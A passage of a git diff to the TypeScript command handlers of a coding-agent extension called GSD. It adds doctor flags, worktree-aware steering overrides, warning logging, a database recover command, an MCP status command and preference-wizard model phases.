ExtensionCommandContext, pi: ExtensionAPI): Promise { +/** Parse doctor command args into structured flags and positionals (pure, no I/O). */ +export function parseDoctorArgs(args: string) { const trimmed = args.trim(); - // Extract flags before positional parsing const jsonMode = trimmed.includes("--json"); const dryRun = trimmed.includes("--dry-run"); + const fixFlag = trimmed.includes("--fix"); const includeBuild = trimmed.includes("--build"); const includeTests = trimmed.includes("--test"); - const stripped = trimmed.replace(/--json|--dry-run|--build|--test/g, "").trim(); + const stripped = trimmed.replace(/--json|--dry-run|--build|--test|--fix/g, "").trim(); const parts = stripped ? stripped.split(/\s+/) : []; const mode = parts[0] === "fix" || parts[0] === "heal" || parts[0] === "audit" ? parts[0] : "doctor"; const requestedScope = mode === "doctor" ? parts[0] : parts[1]; + return { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope }; +} + +export async function handleDoctor(args: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise { + const { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope } = parseDoctorArgs(args); const scope = await selectDoctorScope(projectRoot(), requestedScope); const effectiveScope = mode === "audit" ? requestedScope : scope; const report = await runGSDDoctor(projectRoot(), { - fix: mode === "fix" || mode === "heal" || dryRun, + fix: mode === "fix" || mode === "heal" || dryRun || fixFlag, dryRun, scope: effectiveScope, includeBuild, @@ -82,7 +89,7 @@ export async function handleDoctor(args: string, ctx: ExtensionCommandContext, p scope: effectiveScope, includeWarnings: true, }); - const actionable = unresolved.filter(issue => issue.severity === "error" || issue.code === "all_tasks_done_missing_slice_uat" || issue.code === "slice_checked_missing_uat"); + const actionable = unresolved.filter(issue => issue.severity === "error"); if (actionable.length === 0) { ctx.ui.notify("Doctor heal found nothing actionable to hand off to the LLM.", "info"); return; @@ -222,7 +229,19 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, const sid = state.activeSlice?.id ?? "none"; const tid = state.activeTask?.id ?? "none"; const appliedAt = `${mid}/${sid}/${tid}`; - await appendOverride(basePath, change, appliedAt); + + // Resolve the correct target path: only route to a worktree when auto-mode + // is actively running there (in-process or remote). A worktree directory may + // exist from a previous session without being the active runtime path — + // writing there without a live session would silently drop the override. + const autoRunning = isAutoActive() || checkRemoteAutoSession(basePath).running; + const wtPath = autoRunning && mid !== "none" + ? getAutoWorktreePath(basePath, mid) + : null; + const targetPath = wtPath ?? basePath; + await appendOverride(targetPath, change, appliedAt); + + const overrideLoc = wtPath ? "worktree `.gsd/OVERRIDES.md`" : "`.gsd/OVERRIDES.md`"; if (isAutoActive()) { pi.sendMessage({ @@ -232,14 +251,14 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, "", `**Override:** ${change}`, "", - "This override has been saved to `.gsd/OVERRIDES.md` and will be injected into all future task prompts.", + `This override has been saved to ${overrideLoc} and will be injected into all future task prompts.`, "A document rewrite unit will run before the next task to propagate this change across all active plan documents.", "", "If you are mid-task, finish your current work respecting this override. The next dispatched unit will be a document rewrite.", ].join("\n"), display: false, }, { triggerTurn: true }); - ctx.ui.notify(`Override registered: "${change}". Will be applied before next task dispatch.`, "info"); + ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". Will be applied before next task dispatch.`, "info"); } else { pi.sendMessage({ customType: "gsd-hard-steer", @@ -248,13 +267,13 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext, "", `**Override:** ${change}`, "", - "This override has been saved to `.gsd/OVERRIDES.md`.", - "Before continuing, read `.gsd/OVERRIDES.md` and update the current plan documents to reflect this change.", + `This override has been saved to ${overrideLoc}.`, + `Before continuing, read ${overrideLoc} and update the current plan documents to reflect this change.`, "Focus on: active slice plan, incomplete task plans, and DECISIONS.md.", ].join("\n"), display: false, }, { triggerTurn: true }); - ctx.ui.notify(`Override registered: "${change}". Update plan documents to reflect this change.`, "info"); + ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". Update plan documents to reflect this change.`, "info"); } } diff --git a/src/resources/extensions/gsd/commands-inspect.ts b/src/resources/extensions/gsd/commands-inspect.ts index 87eb494b1..5421c00bf 100644 --- a/src/resources/extensions/gsd/commands-inspect.ts +++ b/src/resources/extensions/gsd/commands-inspect.ts @@ -8,6 +8,7 @@ import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; import { existsSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; +import { logWarning } from "./workflow-logger.js"; import { getErrorMessage } from "./error-utils.js"; export interface InspectData { @@ -92,7 +93,7 @@ export async function handleInspect(ctx: ExtensionCommandContext): Promise ctx.ui.notify(formatInspectOutput(data), "info"); } catch (err) { - process.stderr.write(`gsd-db: /gsd inspect failed: ${getErrorMessage(err)}\n`); + logWarning("command", `/gsd inspect failed: ${getErrorMessage(err)}`); ctx.ui.notify("Failed to inspect GSD database. Check stderr for details.", "error"); } } diff --git a/src/resources/extensions/gsd/commands-maintenance.ts b/src/resources/extensions/gsd/commands-maintenance.ts index 5b6c4b8ff..09d9df9dc 100644 --- a/src/resources/extensions/gsd/commands-maintenance.ts +++ b/src/resources/extensions/gsd/commands-maintenance.ts @@ -1,18 +1,20 @@ /** - * GSD Maintenance — cleanup, skip, and dry-run handlers. + * GSD Maintenance — cleanup, skip, dry-run, and recover handlers. * - * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun + * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun, handleRecover */ import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; import { deriveState } from "./state.js"; import { nativeBranchList, nativeDetectMainBranch, nativeBranchListMerged, nativeBranchDelete, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js"; +import { logWarning } from "./workflow-logger.js"; export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePath: string): Promise { let branches: string[]; try { branches = nativeBranchList(basePath, "gsd/*"); - } catch { + } catch (e) { + logWarning("command", `branch list failed: ${(e as Error).message}`); ctx.ui.notify("No GSD branches to clean up.", "info"); return; } @@ -23,7 +25,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa let merged: string[]; try { merged = nativeBranchListMerged(basePath, mainBranch, "gsd/*"); - } catch { + } catch (e) { + logWarning("command", `merged branch list failed: ${(e as Error).message}`); merged = []; } @@ -33,8 +36,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { nativeBranchDelete(basePath, branch, false); deletedMerged++; - } catch { - /* skip branches that cannot be deleted */ + } catch (e) { + logWarning("command", `branch delete failed for ${branch}: ${(e as Error).message}`); } } @@ -44,8 +47,10 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { const { listWorktrees } = await import("./worktree-manager.js"); const { resolveMilestoneFile } = await import("./paths.js"); - const { loadFile, parseRoadmap } = await import("./files.js"); + const { loadFile } = await import("./files.js"); + const { parseRoadmap } = await import("./parsers-legacy.js"); const { isMilestoneComplete } = await import("./state.js"); + const { isDbAvailable, getMilestone } = await import("./gsd-db.js"); const attachedBranches = new Set( listWorktrees(basePath).map((wt) => wt.branch), @@ -54,12 +59,29 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa for (const branch of milestoneBranches) { if (attachedBranches.has(branch)) continue; const milestoneId = branch.replace(/^milestone\//, ""); + + // DB-first: check milestone status directly + if (isDbAvailable()) { + const dbRow = getMilestone(milestoneId); + if (dbRow) { + if (dbRow.status !== "complete" && dbRow.status !== "done") continue; + // Milestone is complete per DB — proceed to delete branch + try { + nativeBranchDelete(basePath, branch, true); + deletedStaleMilestones++; + } catch (e) { logWarning("command", `stale milestone branch delete failed for ${branch}: ${(e as Error).message}`); } + continue; + } + } + + // Filesystem fallback const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); if (!roadmapPath) continue; let roadmapContent: string | null = null; try { roadmapContent = await loadFile(roadmapPath); - } catch { + } catch (e) { + logWarning("command", `loadFile failed for ${roadmapPath}: ${(e as Error).message}`); roadmapContent = null; } if (!roadmapContent) continue; @@ -67,12 +89,12 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { nativeBranchDelete(basePath, branch, true); deletedStaleMilestones++; - } catch { - /* non-fatal */ + } catch (e) { + logWarning("command", `milestone branch delete failed for ${branch}: ${(e as Error).message}`); } } - } catch { - /* non-fatal */ + } catch (e) { + logWarning("command", `stale milestone cleanup failed: ${(e as Error).message}`); } const summary: string[] = []; @@ -104,7 +126,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP let refs: string[]; try { refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); - } catch { + } catch (e) { + logWarning("command", `snapshot ref list failed: ${(e as Error).message}`); ctx.ui.notify("No snapshot refs to clean up.", "info"); return; } @@ -129,8 +152,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP try { nativeUpdateRef(basePath, old); pruned++; - } catch { - /* skip individual failures */ + } catch (e) { + logWarning("command", `snapshot ref update failed for ${old}: ${(e as Error).message}`); } } } @@ -146,7 +169,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP let statuses; try { statuses = getAllWorktreeHealth(basePath); - } catch { + } catch (e) { + logWarning("command", `worktree health inspection failed: ${(e as Error).message}`); ctx.ui.notify("Failed to inspect worktrees.", "error"); return; } @@ -179,7 +203,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP removeWorktree(basePath, wt.name, { deleteBranch: true }); lines.push(` ✓ ${wt.name} removed (branch ${wt.branch} deleted)`); removed++; - } catch { + } catch (e) { + logWarning("command", `worktree removal failed for ${wt.name}: ${(e as Error).message}`); lines.push(` ✗ ${wt.name} failed to remove`); } } @@ -228,7 +253,7 @@ export async function handleSkip(unitArg: string, ctx: ExtensionCommandContext, if (fileExists(completedKeysFile)) { keys = JSON.parse(readFile(completedKeysFile, "utf-8")); } - } catch { /* start fresh */ } + } catch (e) { logWarning("command", `completed-units.json parse failed: ${(e as Error).message}`); } // Normalize: accept "execute-task/M001/S01/T03", "M001/S01/T03", or just "T03" let skipKey = unitArg; @@ -353,7 +378,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC hashList = readdirSync(projectsDir, { withFileTypes: true }) .filter(e => e.isDirectory()) .map(e => e.name); - } catch { + } catch (e) { + logWarning("command", `readdir failed for project-state directory: ${(e as Error).message}`); ctx.ui.notify(`Failed to read project-state directory at ${projectsDir}.`, "error"); return; } @@ -436,7 +462,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC try { fsRmSync(pathJoin(projectsDir, e.hash), { recursive: true, force: true }); removed++; - } catch { + } catch (err) { + logWarning("command", `project cleanup rm failed for ${e.hash}: ${(err as Error).message}`); failed.push(e.hash); } } @@ -450,3 +477,68 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC ctx.ui.notify(lines.join("\n"), "info"); } + +/** + * `gsd recover` — Reconstruct DB hierarchy state from rendered markdown on disk. + * + * Deletes milestones, slices, and tasks table rows (preserves decisions, + * requirements, artifacts, memories), re-runs `migrateHierarchyToDb()` to + * repopulate from markdown, then calls `deriveState()` to verify sanity. + * + * Prints counts of recovered items and the resulting project phase. + */ +export async function handleRecover(ctx: ExtensionCommandContext, basePath: string): Promise { + const { isDbAvailable: dbAvailable, _getAdapter, transaction: dbTransaction } = await import("./gsd-db.js"); + const { migrateHierarchyToDb } = await import("./md-importer.js"); + const { invalidateStateCache } = await import("./state.js"); + + if (!dbAvailable()) { + ctx.ui.notify("gsd recover: No database open. Run a GSD command first to initialize the DB.", "error"); + return; + } + + try { + // 1. Delete + re-populate inside a single transaction for atomicity + const db = _getAdapter()!; + const counts = dbTransaction(() => { + db.exec("DELETE FROM tasks"); + db.exec("DELETE FROM slices"); + db.exec("DELETE FROM milestones"); + return migrateHierarchyToDb(basePath); + }); + + // 3. Invalidate state cache so deriveState() picks up fresh DB data + invalidateStateCache(); + + // 4. Derive state to verify sanity + const state = await deriveState(basePath); + + // 5. Report + const lines = [ + `gsd recover: reconstructed hierarchy from markdown`, + ` Milestones: ${counts.milestones}`, + ` Slices: ${counts.slices}`, + ` Tasks: ${counts.tasks}`, + ``, + ` Phase: ${state.phase}`, + ]; + if (state.activeMilestone) { + lines.push(` Active: ${state.activeMilestone.id}: ${state.activeMilestone.title}`); + } + if (state.activeSlice) { + lines.push(` Slice: ${state.activeSlice.id}: ${state.activeSlice.title}`); + } + if (state.activeTask) { + lines.push(` Task: ${state.activeTask.id}: ${state.activeTask.title}`); + } + + process.stderr.write( + `gsd-recover: recovered ${counts.milestones}M/${counts.slices}S/${counts.tasks}T hierarchy\n`, + ); + ctx.ui.notify(lines.join("\n"), "success"); + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + logWarning("command", `recover failed: ${msg}`); + ctx.ui.notify(`gsd recover failed: ${msg}`, "error"); + } +} diff --git a/src/resources/extensions/gsd/commands-mcp-status.ts b/src/resources/extensions/gsd/commands-mcp-status.ts new file mode 100644 index 000000000..560e58d03 --- /dev/null +++ b/src/resources/extensions/gsd/commands-mcp-status.ts @@ -0,0 +1,247 @@ +/** + * MCP Status — `/gsd mcp` command handler. + * + * Shows configured MCP servers, their connection status, and available tools. + * + * Subcommands: + * /gsd mcp — Overview of all servers (alias: /gsd mcp status) + * /gsd mcp status — Same as bare /gsd mcp + * /gsd mcp check — Detailed status for a specific server + */ + +import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { existsSync, readFileSync } from "node:fs"; +import { join } from "node:path"; + +// ─── Types ────────────────────────────────────────────────────────────────── + +export interface McpServerStatus { + name: string; + transport: "stdio" | "http" | "unknown"; + connected: boolean; + toolCount: number; + error: string | undefined; +} + +export interface McpServerDetail extends McpServerStatus { + tools: string[]; +} + +// ─── Config reader (standalone — does not import mcp-client internals) ────── + +interface McpServerRawConfig { + name: string; + transport: "stdio" | "http" | "unknown"; + command?: string; + args?: string[]; + url?: string; +} + +function readMcpConfigs(): McpServerRawConfig[] { + const servers: McpServerRawConfig[] = []; + const seen = new Set(); + const configPaths = [ + join(process.cwd(), ".mcp.json"), + join(process.cwd(), ".gsd", "mcp.json"), + ]; + + for (const configPath of configPaths) { + try { + if (!existsSync(configPath)) continue; + const raw = readFileSync(configPath, "utf-8"); + const data = JSON.parse(raw) as Record; + const mcpServers = (data.mcpServers ?? data.servers) as + | Record> + | undefined; + if (!mcpServers || typeof mcpServers !== "object") continue; + + for (const [name, config] of Object.entries(mcpServers)) { + if (seen.has(name)) continue; + seen.add(name); + + const hasCommand = typeof config.command === "string"; + const hasUrl = typeof config.url === "string"; + const transport: McpServerRawConfig["transport"] = hasCommand + ? "stdio" + : hasUrl + ? "http" + : "unknown"; + + servers.push({ + name, + transport, + ...(hasCommand && { + command: config.command as string, + args: Array.isArray(config.args) ? (config.args as string[]) : undefined, + }), + ...(hasUrl && { url: config.url as string }), + }); + } + } catch { + // Non-fatal — config file may not exist or be malformed + } + } + + return servers; +} + +// ─── Formatters (exported for testing) ────────────────────────────────────── + +export function formatMcpStatusReport(servers: McpServerStatus[]): string { + if (servers.length === 0) { + return [ + "No MCP servers configured.", + "", + "Add servers to .mcp.json or .gsd/mcp.json to enable MCP integrations.", + "See: https://modelcontextprotocol.io/quickstart", + ].join("\n"); + } + + const lines: string[] = [`MCP Server Status — ${servers.length} server(s)\n`]; + + for (const s of servers) { + const icon = s.error ? "✗" : s.connected ? "✓" : "○"; + const status = s.error + ? `error: ${s.error}` + : s.connected + ? `connected — ${s.toolCount} tools` + : "disconnected"; + lines.push(` ${icon} ${s.name} (${s.transport}) — ${status}`); + } + + lines.push(""); + lines.push("Use /gsd mcp check for details on a specific server."); + lines.push("Use mcp_discover to connect and list tools for a server."); + + return lines.join("\n"); +} + +export function formatMcpServerDetail(server: McpServerDetail): string { + const lines: string[] = [`MCP Server: ${server.name}\n`]; + + lines.push(` Transport: ${server.transport}`); + + if (server.error) { + lines.push(` Status: error`); + lines.push(` Error: ${server.error}`); + } else if (server.connected) { + lines.push(` Status: connected`); + lines.push(` Tools: ${server.toolCount}`); + if (server.tools.length > 0) { + lines.push(""); + lines.push(" Available tools:"); + for (const tool of server.tools) { + lines.push(` - ${tool}`); + } + } + } else { + lines.push(` Status: disconnected`); + lines.push(""); + lines.push(` Run mcp_discover("${server.name}") to connect and list tools.`); + } + + return lines.join("\n"); +} + +// ─── Command handler ──────────────────────────────────────────────────────── + +/** + * Handle `/gsd mcp [status|check ]`. + */ +export async function handleMcpStatus( + args: string, + ctx: ExtensionCommandContext, +): Promise { + const trimmed = args.trim().toLowerCase(); + const configs = readMcpConfigs(); + + // /gsd mcp check + if (trimmed.startsWith("check ")) { + const serverName = args.trim().slice("check ".length).trim(); + const config = configs.find((c) => c.name === serverName); + if (!config) { + const available = configs.map((c) => c.name).join(", ") || "(none)"; + ctx.ui.notify( + `Unknown MCP server: "${serverName}"\n\nAvailable: ${available}`, + "warning", + ); + return; + } + + // Try to get connection/tool info from the mcp-client module if available + let connected = false; + let toolNames: string[] = []; + let error: string | undefined; + try { + const mcpClient = await import("../mcp-client/index.js"); + // Access the module's connection state if exported; fall back gracefully + const mod = mcpClient as Record; + if (typeof mod.getConnectionStatus === "function") { + const status = (mod.getConnectionStatus as (name: string) => { connected: boolean; tools: string[]; error?: string })(serverName); + connected = status.connected; + toolNames = status.tools; + error = status.error; + } + } catch { + // mcp-client may not expose status helpers — that's fine + } + + ctx.ui.notify( + formatMcpServerDetail({ + name: config.name, + transport: config.transport, + connected, + toolCount: toolNames.length, + tools: toolNames, + error, + }), + "info", + ); + return; + } + + // /gsd mcp or /gsd mcp status + if (!trimmed || trimmed === "status") { + // Build status for each server + const statuses: McpServerStatus[] = []; + + for (const config of configs) { + let connected = false; + let toolCount = 0; + let error: string | undefined; + + try { + const mcpClient = await import("../mcp-client/index.js"); + const mod = mcpClient as Record; + if (typeof mod.getConnectionStatus === "function") { + const status = (mod.getConnectionStatus as (name: string) => { connected: boolean; tools: string[]; error?: string })(config.name); + connected = status.connected; + toolCount = status.tools.length; + error = status.error; + } + } catch { + // Fall back to unknown state + } + + statuses.push({ + name: config.name, + transport: config.transport, + connected, + toolCount, + error, + }); + } + + ctx.ui.notify(formatMcpStatusReport(statuses), "info"); + return; + } + + // Unknown subcommand + ctx.ui.notify( + "Usage: /gsd mcp [status|check ]\n\n" + + " status Show all MCP server statuses (default)\n" + + " check Detailed status for a specific server", + "warning", + ); +} diff --git a/src/resources/extensions/gsd/commands-prefs-wizard.ts b/src/resources/extensions/gsd/commands-prefs-wizard.ts index 46e4b0a37..f94a78010 100644 --- a/src/resources/extensions/gsd/commands-prefs-wizard.ts +++ b/src/resources/extensions/gsd/commands-prefs-wizard.ts @@ -165,10 +165,10 @@ export function buildCategorySummaries(prefs: Record): Record | undefined; + const models = prefs.models as Record | undefined; let modelsSummary = "(not configured)"; if (models && Object.keys(models).length > 0) { - const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${model}`); + const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${formatConfiguredModel(model)}`); modelsSummary = parts.join(", "); } @@ -184,11 +184,23 @@ export function buildCategorySummaries(prefs: Record): Record | undefined; + const staleThreshold = prefs.stale_commit_threshold_minutes; + const absorbSnapshots = git?.absorb_snapshot_commits; let gitSummary = "(defaults)"; - if (git && Object.keys(git).length > 0) { - const branch = git.main_branch ?? "main"; - const push = git.auto_push ? "on" : "off"; - gitSummary = `main: ${branch}, push: ${push}`; + { + const parts: string[] = []; + if (git && Object.keys(git).length > 0) { + const branch = git.main_branch ?? "main"; + const push = git.auto_push ? "on" : "off"; + parts.push(`main: ${branch}, push: ${push}`); + } + if (staleThreshold !== undefined) { + parts.push(`stale: ${staleThreshold === 0 ? "off" : `${staleThreshold}m`}`); + } + if (absorbSnapshots !== undefined) { + parts.push(`absorb: ${absorbSnapshots ? "on" : "off"}`); + } + if (parts.length > 0) gitSummary = parts.join(", "); } // Skills @@ -243,9 +255,38 @@ export function buildCategorySummaries(prefs: Record): Record): Promise { - const modelPhases = ["research", "planning", "execution", "completion"] as const; - const models: Record = (prefs.models as Record) ?? {}; + const modelPhases = [ + "research", + "planning", + "discuss", + "execution", + "execution_simple", + "completion", + "validation", + "subagent", + ] as const; + const models: Record = (prefs.models as Record) ?? {}; const availableModels = ctx.modelRegistry.getAvailable(); if (availableModels.length > 0) { @@ -265,15 +306,22 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record a.id.localeCompare(b.id)); } - // Build provider menu with model counts + // Display names for providers in the preferences wizard UI. + const PROVIDER_DISPLAY_NAMES: Record = { anthropic: "anthropic-api" }; + const displayName = (p: string) => PROVIDER_DISPLAY_NAMES[p] ?? p; + + // Build provider menu with model counts (display name → real name lookup) + const displayToReal = new Map(); const providerOptions = providers.map(p => { const count = byProvider.get(p)!.length; - return `${p} (${count} models)`; + const label = `${displayName(p)} (${count} models)`; + displayToReal.set(label, p); + return label; }); providerOptions.push("(keep current)", "(clear)", "(type manually)"); for (const phase of modelPhases) { - const current = models[phase] ?? ""; + const current = formatConfiguredModel(models[phase]); const phaseLabel = `Model for ${phase} phase${current ? ` (current: ${current})` : ""}`; // Step 1: pick provider @@ -298,25 +346,25 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record m.id); modelOptions.push("(keep current)", "(clear)"); - const modelChoice = await ctx.ui.select(`${phaseLabel} — ${providerName}:`, modelOptions); + const modelChoice = await ctx.ui.select(`${phaseLabel} — ${displayName(providerName)}:`, modelOptions); if (modelChoice && typeof modelChoice === "string" && modelChoice !== "(keep current)") { if (modelChoice === "(clear)") { delete models[phase]; } else { - models[phase] = modelChoice; + models[phase] = toPersistedModelId(providerName, modelChoice); } } } } else { for (const phase of modelPhases) { - const current = models[phase] ?? ""; + const current = formatConfiguredModel(models[phase]); const input = await ctx.ui.input( `Model for ${phase} phase${current ? ` (current: ${current})` : ""}:`, current || "e.g. claude-sonnet-4-20250514", @@ -333,6 +381,8 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record 0) { prefs.models = models; + } else { + delete prefs.models; } } @@ -390,7 +440,7 @@ async function configureGit(ctx: ExtensionCommandContext, prefs: Record 0) { prefs.git = git; } + + // stale_commit_threshold_minutes (top-level pref, shown in Git section) + const currentThreshold = prefs.stale_commit_threshold_minutes; + const thresholdStr = currentThreshold !== undefined ? String(currentThreshold) : ""; + const thresholdInput = await ctx.ui.input( + `Stale commit threshold (minutes, 0 to disable)${thresholdStr ? ` (current: ${thresholdStr})` : " (default: 30)"}:`, + thresholdStr || "30", + ); + if (thresholdInput !== null && thresholdInput !== undefined) { + const val = thresholdInput.trim(); + const parsed = tryParseInteger(val); + if (val && parsed !== null && parsed >= 0) { + prefs.stale_commit_threshold_minutes = parsed; + } else if (val && parsed === null) { + ctx.ui.notify(`Invalid value "${val}" — must be a whole number. Keeping previous value.`, "warning"); + } else if (!val && currentThreshold !== undefined) { + delete prefs.stale_commit_threshold_minutes; + } + } } async function configureSkills(ctx: ExtensionCommandContext, prefs: Record): Promise { @@ -588,7 +668,7 @@ export async function configureMode(ctx: ExtensionCommandContext, prefs: Record< if (modeStr.startsWith("solo")) { prefs.mode = "solo"; ctx.ui.notify( - "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=false, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false", + "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=auto, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false", "info", ); } else if (modeStr.startsWith("team")) { @@ -771,7 +851,7 @@ export async function ensurePreferencesFile( scope: "global" | "project", ): Promise { if (!existsSync(path)) { - const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "preferences.md")); + const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "PREFERENCES.md")); if (!template) { ctx.ui.notify("Could not load GSD preferences template.", "error"); return; diff --git a/src/resources/extensions/gsd/commands/catalog.ts b/src/resources/extensions/gsd/commands/catalog.ts index 6f2613382..1aa1040f1 100644 --- a/src/resources/extensions/gsd/commands/catalog.ts +++ b/src/resources/extensions/gsd/commands/catalog.ts @@ -15,7 +15,7 @@ export interface GsdCommandDefinition { type CompletionMap = Record; export const GSD_COMMAND_DESCRIPTION = - "GSD — Get Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|rate|skip|export|cleanup|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast"; + "GSD — Get Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|undo-task|reset-slice|rate|skip|export|cleanup|model|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast|mcp|rethink|codebase|notifications"; export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "help", desc: "Categorized command reference with descriptions" }, @@ -35,10 +35,13 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "dispatch", desc: "Dispatch a specific phase directly" }, { cmd: "history", desc: "View execution history" }, { cmd: "undo", desc: "Revert last completed unit" }, + { cmd: "undo-task", desc: "Reset a specific task's completion state (DB + markdown)" }, + { cmd: "reset-slice", desc: "Reset a slice and all its tasks (DB + markdown)" }, { cmd: "rate", desc: "Rate last unit's model tier (over/ok/under) — improves adaptive routing" }, { cmd: "skip", desc: "Prevent a unit from auto-mode dispatch" }, { cmd: "export", desc: "Export milestone/slice results" }, { cmd: "cleanup", desc: "Remove merged branches or snapshots" }, + { cmd: "model", desc: "Switch the active session model or open a picker" }, { cmd: "mode", desc: "Switch workflow mode (solo/team)" }, { cmd: "prefs", desc: "Manage preferences (model selection, timeouts, etc.)" }, { cmd: "config", desc: "Set API keys for external tools" }, @@ -46,6 +49,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "hooks", desc: "Show configured post-unit and pre-dispatch hooks" }, { cmd: "run-hook", desc: "Manually trigger a specific hook" }, { cmd: "skill-health", desc: "Skill lifecycle dashboard" }, + { cmd: "notifications", desc: "View, filter, and clear persistent notification history" }, { cmd: "doctor", desc: "Runtime health checks with auto-fix" }, { cmd: "logs", desc: "Browse activity logs, debug logs, and metrics" }, { cmd: "forensics", desc: "Examine execution logs" }, @@ -57,7 +61,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "inspect", desc: "Show SQLite DB diagnostics" }, { cmd: "knowledge", desc: "Add persistent project knowledge (rule, pattern, or lesson)" }, { cmd: "new-milestone", desc: "Create a milestone from a specification document (headless)" }, - { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge)" }, + { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge, watch)" }, { cmd: "cmux", desc: "Manage cmux integration (status, sidebar, notifications, splits)" }, { cmd: "park", desc: "Park a milestone — skip without deleting" }, { cmd: "unpark", desc: "Reactivate a parked milestone" }, @@ -66,7 +70,10 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "templates", desc: "List available workflow templates" }, { cmd: "extensions", desc: "Manage extensions (list, enable, disable, info)" }, { cmd: "fast", desc: "Toggle OpenAI service tier (on/off/flex/status)" }, + { cmd: "mcp", desc: "MCP server status and connectivity check (status, check )" }, + { cmd: "rethink", desc: "Conversational project reorganization — reorder, park, discard, add milestones" }, { cmd: "workflow", desc: "Custom workflow lifecycle (new, run, list, validate, pause, resume)" }, + { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache (.gsd/CODEBASE.md)" }, ]; const NESTED_COMPLETIONS: CompletionMap = { @@ -96,6 +103,7 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "pause", desc: "Pause a specific worker" }, { cmd: "resume", desc: "Resume a paused worker" }, { cmd: "merge", desc: "Merge completed milestone branches" }, + { cmd: "watch", desc: "Live TUI dashboard monitoring all workers" }, ], setup: [ { cmd: "llm", desc: "Configure LLM provider settings" }, @@ -104,6 +112,11 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "keys", desc: "Manage API keys" }, { cmd: "prefs", desc: "Configure global preferences" }, ], + notifications: [ + { cmd: "clear", desc: "Clear all notifications" }, + { cmd: "tail", desc: "Show last N notifications (default: 20)" }, + { cmd: "filter", desc: "Filter by severity (error|warning|info|success)" }, + ], logs: [ { cmd: "debug", desc: "List or view debug log files" }, { cmd: "tail", desc: "Show last N activity log summaries" }, @@ -185,6 +198,10 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "flex", desc: "Flex tier (0.5x cost, slower)" }, { cmd: "status", desc: "Show current service tier setting" }, ], + mcp: [ + { cmd: "status", desc: "Show all MCP server statuses (default)" }, + { cmd: "check", desc: "Detailed status for a specific server" }, + ], doctor: [ { cmd: "fix", desc: "Auto-fix detected issues" }, { cmd: "heal", desc: "AI-driven deep healing" }, @@ -216,6 +233,16 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "pause", desc: "Pause custom workflow auto-mode" }, { cmd: "resume", desc: "Resume paused custom workflow auto-mode" }, ], + codebase: [ + { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" }, + { cmd: "generate --max-files", desc: "Generate with custom file limit (default: 500)" }, + { cmd: "generate --collapse-threshold", desc: "Generate with custom collapse threshold (default: 20)" }, + { cmd: "update", desc: "Refresh the 